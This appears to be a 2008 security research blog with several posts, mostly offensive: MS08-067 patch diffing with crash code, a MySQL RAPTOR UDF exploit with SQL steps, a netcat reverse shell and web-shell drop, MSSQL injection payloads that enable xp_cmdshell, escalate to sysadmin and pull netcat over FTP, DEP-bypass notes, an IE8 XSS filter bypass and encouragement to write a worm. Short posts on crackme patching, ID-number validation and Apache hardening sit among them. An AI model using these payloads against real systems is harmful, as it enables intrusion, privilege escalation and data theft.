Abysssec Security Research

hello again to all our patient readers

it’s been a long time since we wrote our last post’s ?! first of all i should say sorry for late in blog updates but the first reason is  we are really busy in these days with accomplish our projects . the second reason was changing our server . and finally the third reason is starting abysssec inc with a professional team for accomplish new projects and services . in soon future we have lots of good news may that’s interest you . so please be patient to see our news on our new index (that come soon as soon possible)

===================================================================

today i wanna talk about Microsoft security patch’s analysis  . as you know this year and specially last month’s of this year was a nightmare for M$ windows because we saw MS08-067 – MS08-068 – MS08-006 and MS08-001 and etc . and as you know too publishing real and working exploits is going to die and just you can see commercial exploits on time .

i saw this picture in one of Mr Nicolas Waisman  presentation and i believe to mind of this picture :

my goal from this introduction is if you want an exploit on publishing time you just have two chose :

1- write your own exploit

2- buy commercial exploit for your requirement vulnerability

- if you are a super millionaire you can buy all commercial exploits from variant security research teams and we are one of them ;)

- and if you are not you and you like and you need an exploit on time you should write your own exploit . and writing exploit for modern operation system’s is not easy because you need bypass a dozen of memory protections (such as DEP / ASLR / SAFSEH / Safe unlinking   and etc …  (from OS to commercial target software) also i believe this Mr Dave Aitel sentence : Not only are bugs expensive but the techniques for reliably exploiting bugs becomes expensive .

anyway becoming a real exploit coder is not easy but it’s possible and i should quote and notice another sentence that is : Modern Exploits – Do You Still Need To Learn Assembly Language (ASM) ( you can read full post here : (http://www.darknet.org.uk/2008/09/modern-exploits-do-you-still-need-to-learn-assembly-language-asm/)

i,m fully sure learning assembly language will help you in all of exploit development levels from reversing and understanding vulnerability to writing reliable exploit code for modern operation system’s .

after you can understand assembly code you can supposition high level code and thereupon you can identify vulnerability from discrepancy between patched and unpatched binaries (however advanced tools and IDA plugin’s make your life easier and you can identify vulnerable code / function if a few minutes)  this technic is called binary diffing. in future i,ll discuss a few advanced trick and methods , that’s improve your speed and analysis but for now i just talk about main of binary diffing on Microsoft security patch’s .

first step is downloading patch from Microsoft . the best way is searching on Microsoft site for your target bulletin . for example see MS08-067 (my favorite bug in this year :D )

just you need click on your target os and download the path.

after you downloaded the patch as you know you should not install the patch and you need extract patch data

with /x command .for example extracting ms08-067 patch :

the output of executing atop command is extract all date inside the patch . and in this example result is :

as you can see in this patch we have just one file and that is a dll named netapi32.dll so we can understand vulnerable function is in this dll .

next step is find vulnerable (unpatched) file (or files) on your system and then you can rename patched file to filename_patched.XXX and then you can analysis and notice changes in patched and unpatched files.

for accomplish this procedure you can use different tools and ways . but using IDA Pro is one of best and logical ways you can use for this procedure . you can understand changes without any plugins and auxiliary tools but for imporving speed and getting better result you have tree choice .

1- using bindiff (exclusive commercial IDA plugin and best auxiliary too analysis

for example you can see patch analysis video for MS08-001 (TCP/IP Kernel Pool Overflow)  here :

http://www.zynamics.com/files/ms08001.swf

2- using Eeye DiffingSuite  i like this tools because it’s really easy to use and effective .

you can download this tools from following link :

http://research.eeye.com/html/Tools/download/DiffingSuiteSetup.exe

and also you see tree good video about analysis different patched with this tools

- analysing MS06-033 : http://research.eeye.com/html/tools/tutorials/BDS_v_MS06-033.htm

- analysing MS06-007 : http://research.eeye.com/html/tools/tutorials/MS06-007.htm

- analysing MS06-036 : http://research.eeye.com/html/tools/tutorials/MS06-036%20Analysis.htm

after videos please read following link (a good work from Mr stephen lawler) about full reverse of MS08-067 patch using DiffingSuite and IDA pro cheerfully because it contain divisor of work :

http://www.dontstuffbeansupyournose.com/?p=35

3- using tenable security PatchDiff . PatchDiff is another IDA Pro Plugin (like bindiff) but have a big difference with Bindiff this plugin is free !

you can see a video about this plugin here :

http://cgi.tenablesecurity.com/tenable/pdiff2.swf.html

and you can download this plugin from following link :

http://cgi.tenablesecurity.com/tenable/dl.php?p=patchdiff2-2.0.5.zip

using this plugin is so easy but i discuss a few about this plugin  . frist of all you need patched and unpatched binaries after this you just first need open unpatched binary IDA and save disassembly in idb file after that you should open patched binary and save disassembly result to another idb file :

since  this you just need open unpatched IDB using plugin to understating discrepancy . after this step as Mr Nicolas Pouvesle (pathdiff plugin author) discussed graph nodes can be synchronized by double clicking on a given node. Graphs use the following colors:

• white: identical nodes
• grey: unmatched nodes
• red: matched nodes
• tan: identical nodes (different crc)

for example you see patchdiff result for MS08-067 patch :

and :

if you be smart you can write a high level simulator code for vulnerable function . for example Mr Alexander Sotirov wrote a simulator of vulnerable function :


#include

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3
// and sub_6EA11D4D on Vista SP1

int ms08_067(wchar_t* path)
{
wchar_t* p;
wchar_t* q;
wchar_t* previous_slash = NULL;
wchar_t* current_slash = NULL;
wchar_t ch;

#ifdef VISTA
int len = wcslen(path);
wchar_t* end_of_path = path + len;
#endif

// If the path starts with a server name, skip it

if ((path[0] == L’\\’ || path[0] == L’/') &&
(path[1] == L’\\’ || path[1] == L’/'))
{
p = path+2;

while (*p != L’\\’ && *p != L’/') {
if (*p == L’\0′)
return 0;
p++;
}

p++;

// make path point after the server name

path = p;

// make sure the server name is followed by a single slash

if (path[0] == L’\\’ || path[0] == L’/')
return 0;
}

if (path[0] == L’\0′) // return if the path is empty
return 1;

// Iterate through the path and canonicalize ..\ and .\

p = path;

while (1) {
if (*p == L’\\’) {
// we have a slash

if (current_slash == p-1) // don’t allow consequtive slashes
return 0;

// store the locations of the current and previous slashes

previous_slash = current_slash;
current_slash = p;
}
else if (*p == L’.’ && (current_slash == p-1 || p == path)) {
// we have \. or ^.

if (p[1] == L’.’ && (p[2] == L’\\’ || p[2] == L’\0′)) {
// we have a \..\, \..$, ^..\ or ^..$ sequence

if (previous_slash == NULL)
return 0;

// example: aaa\bbb\..\ccc
// ^ ^ ^
// | | &p[2]
// | |
// | current_slash
// |
// previous_slash

ch = p[2];

#ifdef VISTA
if (previous_slash >= end_of_path)
return 0;

wcscpy_s(previous_slash, (end_of_path-previous_slash)/2, p+2);
#else // XP
wcscpy(previous_slash, &p[2]);
#endif

if (ch == L’\0′)
return 1;

current_slash = previous_slash;
p = previous_slash;

// find the slash before p

// BUG: if previous_slash points to the beginning of the
// string, we’ll go beyond the start of the buffer
//
// example string: \a\..\

q = p-1;

while (*q != L’\\’ && q != path)
q–;

if (*p == L’\\’)
previous_slash = q;
else
previous_slash = NULL;
}
else if (p[1] == L’\\’) {
// we have \.\ or ^.\

#ifdef VISTA
if (current_slash != NULL) {
if (current_slash >= end_of_path)
return 0;
wcscpy_s(current_slash, (end_of_path-current_slash)/2, p+2);
goto end_of_loop;
}
else { // current_slash == NULL
if (p >= end_of_path)
return 0;
wcscpy_s(p, (end_of_path-p)/2, p+2);
goto end_of_loop;
}
#else // XP
if (current_slash != NULL) {
wcscpy(current_slash, p+2);
goto end_of_loop;
}
else { // current_slash == NULL
wcscpy(p, p+2);
goto end_of_loop;
}
#endif
}
else if (p[1] != L’\0′) {
// we have \. or ^. followed by some other char

if (current_slash != NULL) {
p = current_slash;
}
*p = L’\0′;
return 1;
}
}

p++;

end_of_loop:
if (*p == L’\0′)
return 1;
}
}

// Run this program to simulate the MS08-067 vulnerability

int main()
{
return ms08_067(L”\\c\\..\\..\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAA”);
}

final steps are identify vulnerable function / understaning function parameters and write a POC code for controlling EIP .

for example Mr stephen lawler wrote a c program for checking MS08-067 vulnerability by taking the offset between sub_7CDDB23D and the load address of NETAPI32.DLL :


#include

#include

int wmain(int argc, wchar_t **argv)

{

HMODULE netapi32 = LoadLibraryW(argv[1]);

void (__stdcall *foo)(PWCHAR);

WCHAR buf[4096];

*(PVOID*)&foo = (PVOID)(((PUCHAR)netapi32) + 0×1b23d);

//__asm { int 3 }

wcscpy(buf, argv[2]);

foo(buf);

wprintf(L”%s\n”, buf);

}

and finnaly he got a crash :

after getting first crash you just need getting eip and write exploit for vulnerability .

finally i should say sorry for disheveled writing . the reason of this is size of this subject in next post i talk directly about patch analysis tricks and i,ll anlysis another interesting Microsoft Patch step by step .

thank you for your time and attention

best regards

shahin.r

In the name of God.

Hello my friend & all readers  ,

Tomcat [jsp]  &  Jrun  [ColdFusion] & some HTTP server , when called “JSP” function in windows , Attackers can  Privilege Escalation .

This bug Emanate from differ Kernel in windows and Linux .

Example Vulnerable Software : “PLESK” or many of web management systems  Used them , you can find them .

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of Run  web Application In windows [ Attention in user mode & kernel Mode ] :

.

.

Diagram of Run  web Application In Linux [ Attention in user mode & kernel Mode ] :

.

.

Please Attention to diragrams , I don’t mean describe win & lin kernel , But you see , in windows services security & Application Security  are in user mode & you are not face to face with kernel  , But in  linux we have a different Calling Services & user access .

when “JSP” web application Run in Linux [ with tomcat  or other Server ] , You can use Privilege of owner [runner] user . but , when you run This in  windows [TOMCAT or Jrun web server ]   ,  “JSP” Application take jrun or tomcat Access .

They have Administrator Access . Therefor You have Admin level process.

use [getRuntime().exec] Function in [JSP] you can run Process .

This is a test  . [Detail]

import java.io.IOException;Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\"");

here is one of published PoC For this vulnerabilities

we can run it , [abysssec.jsp] -> :

< %@ page import="java.util.*,java.io.*"%>
< %
%>

# milw0rm.com [2008-11-28]


Here we go , another tutorial about unpacking general lame packers

hope you enjoy

if you are interest you can download full tutorial from following link :

http://rapidshare.com/files/162093080/New.rar.html

good luck and have fun

GOD.

Hi,  Privilege Escalation in windows (from 2000 to2008) with mysql DLL & Functions.

when you Install MYSQL in windows OS ,  if you forgot give Permission  to “DATA” folder , an attacker can read ROOT Password in mysql DATABAS .

Example :

1- Goto :
C://program files/mysql5.0.45/data/mysql

2- READ —> user.MYD

3- Crack it with CAIN & Able or any tools you have.
root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E

ok , You can read Data and crack it , for Example cracked hash of atop : “Root:123456d” .

you can use “RAPTOR” , that is ciritical  exploit ,  Add a Dynamic Library to Mysql. This Library will infect target dll like a trojan (REVERSE SHELL , NETCAT ) .

summary of RAPTOR :
MySQL provides a mechanism by which the default set of functions can be expanded by means of custom written dynamic libraries containing User Defined Functions, or UDFs. If MySQL is installed with root privileges, the UDF mechanism allows an attacker to install and run malicious code as root.

anyway , You can Connected To mysql with [asp,php,...]SHELL or PhpMyadmin or Terminal [In Example , I connected With Mysql Shell ]

Download Raptor in windows :

http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

c:\mysql> mysql -h 192.168.0.203

- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//winudf.dll’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘c://windows//system32//winudf.dll’;
-CREATE FUNCTION netcat RETURNS integer SONAME ‘winudf.dll’;
-CREATE FUNCTION exec RETURNS integer SONAME ‘winudf.dll’;
-DROP TABLE foo;

then when you write :

select * from mysql.func;

you must see up result .

you can run Command in Administrator Privilege , [example] :

– mysql> select exec(‘echo foo > c:\\bar.txt’);
– mysql> select netcat(’192.168.0.147′);

Technical information , why This happened ?

From Mysql 5 on, there is an scheduler available similar to SQLAgent and job scheduler in Oracle, so it seems
we have something to run our scripting code once ready.
However, it is not activated by default, but we can assume to execute the backdoor using a privileged account/
so this is not a big deal.
Mysql allows the creation of procedures and functions, but there is no scripting language available, so they
are limited to SQL sentences along with basic loops and conditions. Even access to writing and reading from
disk for saving results and reading files, is limited. It seems we cannot go too far this way …
However, Mysql implements an additional functionality very convenient to us: UDF (User Defined Functions).
This allows the definition of user functions and implement them in C++, compile them and use them from
Mysql as any other function of the database. It is not necessary to recompile the full database code, as these
functions are dynamically loaded from the plugin directory (since 5.1 version) and may be used from the
database normally.

Other Attack :

with this Root Privilege in mysql , You can use ROBOTIC ARM  to Move file and give them Admin Privilege!

Example :

- use mysql;
- create table foo(line blob);
-insert into foo values(load_file(‘c://windows//temp//shell.aspx’));
-UNLOCK TABLES;
-SELECT * FROM mysql.foo INTO DUMPFILE ‘e://hosting//ebanking//shell.php’;

Linux version :
http://www.0xdeadbeef.info/exploits/raptor_udf.c

#include <stdio.h>
#include <stdlib.h>

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args {
	unsigned int		arg_count;	// number of arguments
	enum Item_result	*arg_type;	// pointer to item_result
	char 			**args;		// pointer to arguments
	unsigned long		*lengths;	// length of string args
	char			*maybe_null;	// 1 for maybe_null args
} UDF_ARGS;

typedef struct st_udf_init {
	char			maybe_null;	// 1 if func can return NULL
	unsigned int		decimals;	// for real functions
	unsigned long 		max_length;	// for string functions
	char			*ptr;		// free ptr for func data
	char			const_item;	// 0 if result is constant
} UDF_INIT;

int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
	if (args->arg_count != 1)
		return(0);

	system(args->args[0]);

	return(0);
}

In safeguard GOD .

Daphne .

hi again

i,m sure you know about this ciritical / wormable  vulnerability  . immediate after releasing vulnerability Win32.Gimmiv worm released too . this worm use this vulnerability and will run after first execute as a windows service . but i,m sure this worm is not last worm based on this vulnerability .

this vulnerability specifically exists on Server Service Remote Procedure Call (RPC) handling, where an attacker could perform a stacked-based buffer overflow by sending a request to a vulnerable function, “NetPathCanonicalize()”. In this way an attacker may escalate privileges, using the named pipe “\\pipe\srvsvc” to access other machines over the network via the pipe’s file sharing service.

exploiting this vulnerability On win 2k and XP SP1 Sp2 and Sp3  is really fun just rpc requset to based on 4b324fc8-1670-01d3-1278-5a47bf6ee188 to getting reliable eip and code executing . in windows xp sp1 and 2k and of course windows xp sp2 and sp3 with no dep you need just a jmp or call esi or edi register for code executing .

and about windows xp sp2 and sp3 with dep :

you can use address of NtSetInformationProcess call  in ACGENRAL.DLL for disable DEP  of course you need Scratch ( read/write static memory location) and you can find that in ACCGENRAL.dll too .

hd moore independent security researcher used this method for executing shellcode . in windows xp sp3 you can use this method  (using pre-process disable in ACCGENRAL.dll ) (of course with differing address of calling NtSetInformationProcess()) .

from hdm :

The actual function we use to disable NX looks like this:

push    4
lea     eax, [ebp+arg_0]
push    eax
push    22h
push    0FFFFFFFFh
mov     [ebp+arg_0], 2
call    ds:__imp__NtSetInformationProcess@16
i wrote my own reliable exploit and maybe in future i public that for all

and about GIMMIV  worm :

full discussion :

http://community.ca.com/blogs/securityadvisor/archive/2008/10/27/ms08-067-wormable-vulnerability-patched.aspx

The executable “WinbaseInst.exe” is the worm component you can see  worm service after executing binary following this picture :

you can be sure this worm use this vulnerability from founded UUID in basesvc.dll in %SystemRoot%\system32\wbem

after worm scanned and found vulnerable system using 4b324fc8-1670-01d3-1278-5a47bf6ee188 worm run download and execute shellcode following this picture :

this worm use random number and random server for downloading files . i,m sure this worm  have different compiled version (for leaked servers and AV’s ) . maybe in another post i discuss about this worm completely.

you can read full post about reversing ms08-067 patch here :

http://www.dontstuffbeansupyournose.com

next post will be patch analysis part 1

for now test your skills for write your own worm with this vulnerability .

best regards and have nice hacking

hello again .

i think this post must be interesting for iranian peoples . this theme is completely ripped from my  friend soroush dalili weblog finally don’t forgot this post and algorithm was published for educational purposes only so author is not held responsible , used for any other purposes than the one stated above.

Melli card & code

Each person in Iran has a national code which is called “Code Melli”. And, its algorithm is very similar to ISBN algorithm:

The rules are:

1-  This number has 10 digits like: C[1] C[2] C[3] C[4] C[5] C[6] C[7] C[8] C[9] C[10]

2-  3 digits of left must not be equal to 000 (c[1]c[2]c[3]000)

3-  C[10] is a control digit (like ISBN algorithm)

The formula to determine C[10] is:

Let A = (C[1]*10)+ (C[2]*9)+ (C[3]*8)+ (C[4]*7)+ (C[5]*6)+ (C[6]*5)+ (C[7]*4)+ (C[8]*3)+ (C[9]*2)

Let B = A MOD 11

If B == 0 Then C[10]=B Else C[10] = 11-B

This JavaScript function is useful to validation:

//—————Start of Iranian national code checker function—————

True-False

//Written by Soroush Dalili – October 2008

//——————————————————————————————–

function IsIRNationalCode(theNum)

{

if(theNum.length!=10)

{

return false;

}

else

{

if(theNum.substr(0,3)==’000′) return false;

var check = 0;

for(var i=0;i

{

var num = theNum.substr(i,1);

check += num*(10-i)

}

if(check%11)

{

return false;

}

else

{

return true;

}

}

}

//—————End of Iranian national code checker function—————

True-False

//——————————————————————————————–

good luck and have fun

Again it’s me , MrXX
Like what I was to say in this post I going to talk about sample ELF Reversing

I don’t know how many people talk about this later but this tut was some of the strange & maybe new to learn ( I was see many of cracking team just working on the windows , because Linux is free , he but all the OS need some time’s to do some cracking )

All the words you will read is going from author : MrXX ( like pervious post )
Ok let’s started

First think we need some tools
We use these tools for making are way easier
1-Some Program for Crack
2-the GUI Debugger
3-Hex Editor
4-some knowledge about the ASM , Cracking

Ok the first think : Some PJ for Crack

Source Code

Complied Project

Cracked Pj

I was write sample Crack Me for this part
The crack me is open source : he he

#include<stdio.h>

int
main(){
int password=123456;
int inputpass;

printf(“Please Enter a Password to continue > “);
scanf(” %d”,&inputpass);

if ( inputpass == password ){
printf(“\nWelcome u will able to access the Tool\n”);
printf(“\n======================================\n”);
printf(“\nU able Reverse the linux elf file \n”);
printf(“\nKeep Good job    \n”);
printf(“\n======================================\n”);
}
else
{
printf(“\nBAD Password\n”);
}

return(0);
}

You will available to see in the code , we got the IF statement that was check to value
First the pass is = 123456 ok
If pass = user input show the good message or if not show the bad message
Ok I compile it before and executed and see the message
Please Enter a Password to continue > 123
I enter a wrong code and see the bad message

Bad Message

Know how can I able to see the Good message
Let’s start some reversing
2 – I need the GUI debugger ( why ? because many time I use the windows debugger like olly or ida and know I addict to use the gui )
Ok it isn’t problem ( but don’t be lazy like me , u must use the command line debugger like : many …. )
I going and get the  Zero Debugger from address
http://www.zero-bugs.com
( this is one of the Linux app need to be Cracked | and I release the path for this later )
I startup my Ubuntu Linux ( because I use the Ubuntu version of zero debugger )
And after I install Zero Debugger ( need some pack to be installed ) and run the debugger
From zero debugger I go under File > Execute menu and  open my ELF file and I see the disassemble face of the ELF

ZeroDebugger

I scroll done some line and see the CMP ( Compare ) and in the line under I see the JNZ statement , yeah look good ( 4-this is the way u need some knowledge about the ASM , Cracking )
I wrote done the line , 08048406 75 52   jnz 0x804845a
This is cool for the first Crack me , we don’t need to get to the line and see what’s inside , because the crack me is sample

3- know I need to edit the line and change the 75 52 hex to 74 52
Ok I start the hexedit program

HexEditing

And go to the 00000400 line , find the 406 hex code ( remember the 08048406 ) and change the 75 to 74
I save the file into crackme cracked and executed again
I enter a wrong code again and see , yeah the good message

Good Message

We able to Reverse the ELF file
This is it , all routine was sample
But don’t be happy , because when the code getting bigger you will got the bad problem ( why ? because there is no olly or ida or sample code to reverse )
And u must do with command line and many line of code

In the next step we going to crack be bigger crack me : called CrackMe2 using Function
Good luck

Hi God .

Hi Again My Readers!
[Attention ] : I  Break Long command .
1- In mssql , when your Privilege Is USER or Db_Owner You will can Enable XP_DIRTREE And Dir wanted Drive .

viewdetail.aspx?test=22′;exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00–

After Enable , You Can Execute Xp_dirtree and save Result In Database & view It.

2- Enable Execute in Administrator Privilege Without Execute Permission :

Enable XP_EXC:

viewdetail.aspx?test=22′;EXEC+sp_configure+
+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ‘show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping 127.0.0.1′ ;

3- Back UP From Database :

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\1.zip’;–

4- GUEST = DB_OWNER :

/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–

5 – ADDIN TO “BUILTIN\ADMINISTRATORS”

FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –

ENABLE OPENROWSET/OLEDB :

FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

7 – UPLOAD NETCAT or …

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’, ‘server=UNESCO;uid=BUILTIN\Administrators;pwd=’,'set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)

Code:

echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f

Another Way? !

You Can use PANGOLIN , it is good Sql injector with bypass some Protection :

Download :

http://www.nosec.org/

Enjoy .

Daphne .

This Post is a bit review to Apache security and not contain all details but i want write all of them.

When you decide to build a web server based on Open source Os for all web publishing -public or private- all the futures not needed . But sometimes some of them mus tow change carefully. We have to case of Apache using here :

Case 1 : In some cases you need to build a simulated ftp server based on HTTP protocol.

Case 2 : You need to build a MAIL server with HTTP interface. Such as HORD or SQURRIER MAIL.

SO what changes needed ?what kind of futures are usable here for Your jobs ?.

In default installation of Apache -as so useful web server – in a big range of open source operating systems you may see auto indexing and directory browsing , its good for HTTP server as FTP server but is it usable as HTTP-mail server ? Of curse response is NO .Why ? Its so simple .In case 1 you just need to give the permission to your users for reading files and browsing directories JUST!.And denied them to reading or browsing other directories . In case 2 the server design may have a complete configuration with case 1 .Here You must use an interpreter for your scripts and language .So is your directory browsing options may not denied is it possible ?.In example an attacker can change his directory to upper or can see most important data such as web server configurations and – or – some log files or a high level script kiddie could copy you password to anywhere .Now your web server is really crackable and an attacker can read your configurations and may change THEM !!. What did you do ? its so good question .

1- You can change permission of all unneeded directories to deny for other users and groups like :

“[root@server] # chmod -R 700 some directory that you want to hidden from other ”

2- Change the permission of your files to only readable for www and not executable – if you want to use HTML pages – and for script based pages

do “[root@server]# 644 *.php or other scripts
3- If your server pages is PHP you can change a bit the php.ini file

its in my machine :

[root@t4yt4n1 /usr/home/t4z3v4r3d]# cat /usr/local/etc/php.ini | grep basedir
; open_basedir, if set, limits all file operations to the defined directory
open_basedir = /usr/local/www
[root@t4yt4n1 /usr/home/t4z3v4r3d]#
open_basedir = /usr/local/www to the your www directory this is he way of blocking of some php-shell scripts lik c99.php.

what the php shells cand do ?

Hi this is 2′nd part of Apache security .
We want to look how to safe all of our scripts when we have some sites.
In share servers – commercial servers – we can secure our serer by some applications such as Cpanel Plesk or etc.
But how can we secure it by hand ?.Of curse its not so simple but its not hard to do.
Ok lets to see what we can do ?.Let look to this how to from an attacker.
Any of attacker want to get some information to doing a successful attack to any server.
But what is information exactly ?yes any information its correct !,all information may help the attacker to entering in to your server .
What kind of web server , web server version , Os version and type,mod ‘s of your web server is running  , server admin’s mail , dns-server , and …. is a good information to starting an attack.

some of the information can’t be hidden but some of may hidden !!!.
Ok we can change our server’s operating system name , web server name and type and version by some tools and mods – soon – .

All attacks methods are depend  to security of your server .

Ok we have some changes in our apache configuration.
But is it enough?. At the same way :what is the set of security settings for
Apache?.Security is a complex of invisible or bit notes.You can’t deny web viewers to looking your web contents in a little range of time .-in fact you can’t tell to users : Do brows my web contents only one time – but you can denied them to browsing all site in a little range of time  – or attacking such as directory traversal attacks or denial of service attack – .This attack can give a large amount of server resources .you can detect this attack and ban the attacker . Apache developed by some modules now, we can select our needed modules for protection.
Modules may be a helpful tools if you have enough information about how to work this module .Apache have 3 release version : 1.3.X and 2.0.X and 2.X all of this versions can using some modules.
For any platforms that you want to work on it may you need to some changes in configurations and giving resources to web server or changing in firewall rules and etc … . But you are module selector and you are lord of Apache world .Deciding which modules are needed is your job and tuning Apache is your art .
Its end of section one for now because I have no time to continue . i’ll be back very soon – iwant build a http server on my bsd box all of notes are really -In the next section we look for details .

IE8 is a new Microsoft browser, the integrity of its CSS2.1 support, HTML5 support,
built-in development tools and so on. IE8 in the browser security on a very big improvement, not a
built-in unloading the Xss Filter, non-durable type of cross-site scripting attacks do a relatively good
protection. However, 80 sec in the test IE8 found, IE8 the Xss Filter there are Vuln, resulting
in some version of the eastern countries simply can not stop the URL Xss for example,
in the Persian version, use some simple data can Bypass Filter out the strategy IE8.

Vulnerability analysis: As IE8 Xss Filter in the filter to take the coding system is built-in encoding,
in the Persian version will be gb2312, in some other Eastern countries will adopt the appropriate wide-byte coding.
Submitted a non-coding sequences such as% c1 <will be IE8 as a normal character for the East Filter keyword matching,
and in the pages displayed, because of their pages will be designated a UTF-8 encoding for example, in the analytical
time % c1 <is not a valid UTF8 encoding, this will be treated as two characters,resulting in a <bypass the check, this inconsistency has led to the formation of Vuln.
Vuln that: assume that there are web script:


<?php
header("Content-Type: text/html; charset=utf-8");
echo $_GET[c];
?>


In the east of the country IE8 system, if the conduct of conventional XSS such as:

.php?c=<script>alert()</script>

IE8 security strategy will be to stop, but if the
The code can bypass the ie8 xss filter and implementation.

vulnerability state: this vulnerability reported to microsoft (by chinese hacker ) and is awaiting a response.